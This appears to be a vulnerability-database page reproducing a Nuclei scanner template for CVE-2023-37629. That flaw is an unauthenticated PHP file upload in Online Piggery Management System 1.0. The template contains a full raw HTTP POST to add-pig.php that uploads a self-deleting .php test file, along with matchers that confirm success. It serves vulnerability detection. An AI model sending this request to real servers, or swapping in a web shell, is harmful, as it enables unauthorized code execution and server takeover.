Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-37629HistoryAug 29, 2023 - 5:47 p.m.
Online Piggery Management System v1.0 - Unauthenticated File Upload
2023-08-2917:47:46
ProjectDiscovery
github.com
36
cve2023
file upload
remote code execution
online piggery management system
intrusive
simple online piggery management system project
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.6
Confidence
High
EPSS
0.12
Percentile
95.4%
Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
id: CVE-2023-37629
info:
name: Online Piggery Management System v1.0 - Unauthenticated File Upload
author: Harsh
severity: critical
description: |
Online Piggery Management System 1.0 is vulnerable to File Upload. An unauthenticated user can upload a php file by sending a POST request to add-pig.php.
impact: |
Successful exploitation of this vulnerability could result in unauthorized access to the system, data leakage, or even complete compromise of the affected server.
reference:
- https://www.exploit-db.com/exploits/51598
- https://nvd.nist.gov/vuln/detail/CVE-2023-37629
- https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html
- https://github.com/1337kid/Piggery_CMS_multiple_vulns_PoC
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-37629
cwe-id: CWE-434
epss-score: 0.09817
epss-percentile: 0.94811
cpe: cpe:2.3:a:simple_online_piggery_management_system_project:simple_online_piggery_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: simple_online_piggery_management_system_project
product: simple_online_piggery_management_system
tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
variables:
string: "CVE-2023-37629"
http:
- raw:
- |
POST /pig/add-pig.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigno"
pig-fms-100
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="weight"
65465
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="arrived"
{{date_time("%Y-%M-%D")}}
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="gender"
female
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="status"
active
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="breed"
2
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="remark"
4fwefwe
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
Content-Type: application/x-php
<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="submit"
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP--
matchers:
- type: dsl
dsl:
- 'status_code == 302'
- 'contains(content_type, "text/html")'
- 'contains(body, "successfully created")'
condition: and
# digest: 4a0a0047304502206452761da1ebb71b5a2a85b17082354777b0f30a6d38f593ff0fd444629930430221008ec0e5895d41eaf6753d851aafa270e8bfdae54dc65c302ae5e25926af894564:922c64590222798bb761d5b6d8e72950Related
cvelist
cvelist
CVE-2023-37629
2023-07-12 00:00:00
cve
cve
CVE-2023-37629
2023-07-12 17:15:08
packetstorm
packetstorm
Online Piggery Management System 1.0 Shell Upload
2023-07-20 00:00:00
zdt
zdt
prion
prion
Unrestricted file upload
2023-07-12 17:15:00
nvd
nvd
CVE-2023-37629
2023-07-12 17:15:08
exploitdb
exploitdb
CVSS3
9.8
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AI Score
9.6
Confidence
High
EPSS
0.12
Percentile
95.4%
Related for NUCLEI:CVE-2023-37629